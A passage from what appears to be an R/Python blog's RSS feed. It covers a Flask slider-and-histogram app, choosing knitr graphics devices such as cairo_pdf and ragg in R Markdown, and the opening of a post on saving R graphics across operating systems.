&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; updatePlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; $.ajax({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;graph&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;GET&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; contentType&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;application/json;charset=UTF-8&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bins&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.from
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dataType&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;json&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; success&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(data){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plotly.newPlot(&lt;span style="color:#a5d6ff"&gt;&amp;#39;histogram&amp;#39;&lt;/span&gt;, data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(&lt;span style="color:#a5d6ff"&gt;&amp;#39;.js-range-slider&amp;#39;&lt;/span&gt;).ionRangeSlider({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;single&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;big&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; from&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onStart&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; updatePlot,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onFinish&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; updatePlot
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we are getting somewhere. Run your app and navigate to &lt;code&gt;localhost:5000&lt;/code&gt; to see the control and the output plot. As you drag the slider, the plot will redraw.&lt;/p&gt;
&lt;p&gt;To finish up we will add a little styling, just to get us closer to our shiny example target. In our &lt;code&gt;app.css&lt;/code&gt; file under &lt;code&gt;static/css&lt;/code&gt; we add the styling around the input controls and make the title stand out a little more.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;title&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-size&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;rem&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;well&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#f5f5f5&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;border&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;solid&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;#e3e3e3&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;border-radius&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Rerun our application with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python app.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And voila, at &lt;code&gt;localhost:5000&lt;/code&gt; we have something that fairly closely matches our target. I really like flask as a tool for creating web applications and APIs to data and models. There is an awful lot of power and flexibility available in what can be created using the toolset explored here.&lt;/p&gt;
&lt;p&gt;See the finished result at our &lt;a href="https://jr-demo.jmpr.io/hello-flask/" rel="external"&gt;Connect&lt;/a&gt; server.&lt;/p&gt;
&lt;p&gt;Watch this space for more flask posts where we can start to explore some more interesting applications.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-flask/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Setting the Graphics Device in a RMarkdown Document</title><link>https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/</link><pubDate>Wed, 15 Apr 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In our recent post about &lt;a href="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/" rel="external"&gt;saving R graphics&lt;/a&gt;, it became obvious that achieving consistent graphics across platforms or even saving the “correct” graph on a particular OS was challenging. Getting consistent fonts across platforms often failed, and for the default PNG device under Windows, anti-aliasing was also an issue. The conclusion of the post was to use&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt; for saving PDF graphics or&lt;/li&gt;
&lt;li&gt;&lt;code&gt;grDevices::png(..., type = &amp;quot;cairo_png&amp;quot;)&lt;/code&gt; for PNGs or alternatively&lt;/li&gt;
&lt;li&gt;the new {ragg} package.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In many workflows, function calls to graphic devices are not explicit. Instead, the call is made by another package, such as {knitr}.&lt;/p&gt;
&lt;p&gt;When kniting an Rmarkdown document, the default graphics device when creating PDF documents is &lt;code&gt;grDevices::pdf()&lt;/code&gt; and for HTML documents it’s &lt;code&gt;grDevices::png()&lt;/code&gt;. As we &lt;a href="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/" rel="external"&gt;demostrated&lt;/a&gt;, these are the worst possible choices!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-knitr-markdown-png-pdf-graphics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="pdfs-and-pngs"&gt;PDFs and PNGs&lt;/h2&gt;
&lt;p&gt;If you want to save your graphs as PDFs, then simply set&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo_pdf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;at the top of Rmarkdown file. The PNG variant is slightly different as we need to specify the device &lt;code&gt;dev&lt;/code&gt; and also pass the &lt;code&gt;type&lt;/code&gt; argument to the device&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;png&amp;#34;&lt;/span&gt;, dev.args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These options, i.e. &lt;code&gt;dev = &amp;quot;cairo_pdf&amp;quot;&lt;/code&gt;, can also be set at individual chunks.&lt;/p&gt;
&lt;h2 id="the-ragg-package"&gt;The {ragg} Package&lt;/h2&gt;
&lt;p&gt;Setting the &lt;code&gt;agg_png()&lt;/code&gt; function from the {ragg} package as the graphics device is somewhat more tricky as it doesn’t come pre-defined within {knitr}. The {knitr} &lt;a href="https://yihui.org/knitr/options/#plots" rel="external"&gt;docs&lt;/a&gt; states that&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;if none of the 20 built-in devices is appropriate, we can still provide yet another name as long as it is a legal function name which can record plots (it must be of the form function(filename, width, height))&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The arguments of &lt;code&gt;agg_png()&lt;/code&gt; are&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formals&lt;/span&gt;(ragg&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;agg_png)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $filename&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Rplot%03d.png&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $width&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 480&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $height&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 480&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This suggests we can simply set &lt;code&gt;ragg::agg_png()&lt;/code&gt; as the {knitr} &lt;code&gt;dev&lt;/code&gt;, as its of the correct form. However, careful reading of the knitr &lt;a href="https://github.com/yihui/knitr/blob/ffb9df6d76716cabe58f417c0173b36226005e31/R/plot.R#L115" rel="external"&gt;source code&lt;/a&gt; highlights that the &lt;code&gt;dpi&lt;/code&gt; argument isn’t passed to new devices and that the units should be inches. So after a “little” experimentation, we have&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ragg_png &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;, res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;192&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ragg&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;agg_png&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;, res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; res, units &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;in&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ragg_png&amp;#34;&lt;/span&gt;, fig.ext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Remember the &lt;code&gt;dpi&lt;/code&gt; argument isn’t passed to &lt;code&gt;ragg_png()&lt;/code&gt;, so if you want to change the resolution per chunk, then you will need to use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dev.args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(ragg_png &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;192&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As {ragg} is being developed by RStudio, I’m guessing that at some point in the near future, ragg will become native to {knitr}.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Saving R Graphics across OSs</title><link>https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/</link><pubDate>Tue, 14 Apr 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;R is known for it’s amazing &lt;a href="https://www.jumpingrivers.com/blog/our-logo-in-r/" rel="external"&gt;graphics&lt;/a&gt;. Not only {ggplot2}, but also {plotly}, and the other dozens of packages at the graphics &lt;a href="https://cran.r-project.org/web/views/Graphics.html" rel="external"&gt;task view&lt;/a&gt;. There seems to be a graph for every scenario. However once you’ve created your figure, how do you export it? This post compares standard methods for exporting R plots as PNGs/PDFs across different OSs. As R has excellent cross-platform capabilities, we may expect this to follow through to exporting graphics. But as we’ll see, this isn’t the case!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-graphics-cairo-png-pdf-saving"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="saving-graphics"&gt;Saving Graphics&lt;/h2&gt;
&lt;p&gt;Suppose we create a simple {ggplot2} scatter plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(mtcars, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(disp, mpg)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But once created, how do you save the plot to a file? If you want to save the scatter plot as a PDF file, then the standard route is something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pdf&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1.pdf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(g)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;pdf()&lt;/code&gt; function is part of the {grDevices} package that comes with base R. When you call &lt;code&gt;pdf()&lt;/code&gt;, R starts a graphics device driver for producing PDF files. The function &lt;code&gt;dev.off()&lt;/code&gt; then closes the file driver.&lt;/p&gt;
&lt;p&gt;The documentation page on the &lt;code&gt;pdf()&lt;/code&gt; function is very detailed - see &lt;code&gt;?pdf&lt;/code&gt;. It highlights the tension between documentation for the developer and documentation for the user. The former cares about details, such as the fact that larger circles use a Bezier curve. But users just want to save a graph. I suspect that the vast majority of people using the &lt;code&gt;pdf()&lt;/code&gt; function don’t really care about the details. They just want a PDF file that contains their plot!&lt;/p&gt;
&lt;p&gt;There are other functions for creating PDF graphics. You could use &lt;code&gt;Cairo::CairoPDF()&lt;/code&gt; or &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt;. As you might gather, both of these functions use &lt;a href="https://www.cairographics.org/" rel="external"&gt;cairo&lt;/a&gt; graphics. Cairo is a 2D graphics library with support for multiple output devices. These R functions use the Cairo API. What’s not clear from the documentation is how the functions differ (but we’ll see differences later).&lt;/p&gt;
&lt;p&gt;You can determine if you have Cairo capabilities via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;capabilities&lt;/span&gt;()[&lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; cairo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Most standard systems have Cairo support. Part of the difficultly I found when writing this post is that graphic support in R has changed over the years. So it’s very easy to find blog posts that contains out-dated information, especially around Cairo.&lt;/p&gt;
&lt;p&gt;A similar situation applies to PNG graphics. You can use the default graphics device&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(g)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;or you could specify the type via &lt;code&gt;png(..., type = &amp;quot;cairo&amp;quot;)&lt;/code&gt; or &lt;code&gt;png(..., type = &amp;quot;cairo-png&amp;quot;)&lt;/code&gt;. There’s also a relatively new package, {ragg} that can save graphics as PNGs.&lt;/p&gt;
&lt;p&gt;Intuitively, these functions must produce different outputs - otherwise why have them. But what is the difference? Is it file size? Speed of creating graphics? Or something else.&lt;/p&gt;
&lt;h2 id="cross-platform"&gt;Cross Platform&lt;/h2&gt;
&lt;p&gt;One of R’s outstanding features is that it is cross platform. You write R code and it magically works under Linux, Windows and Mac. Indeed, the above the code “runs” under all three operating systems. But does it produce the same graphic under each platform? Spoiler! None of the above functions produce identical output across OS’s. So for “same”, I going to take a lax view and I just want figures that look the same.&lt;/p&gt;
&lt;h2 id="cannoical-graphic"&gt;Cannoical Graphic&lt;/h2&gt;
&lt;p&gt;To create a test graphic, we first make some data&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set.seed&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
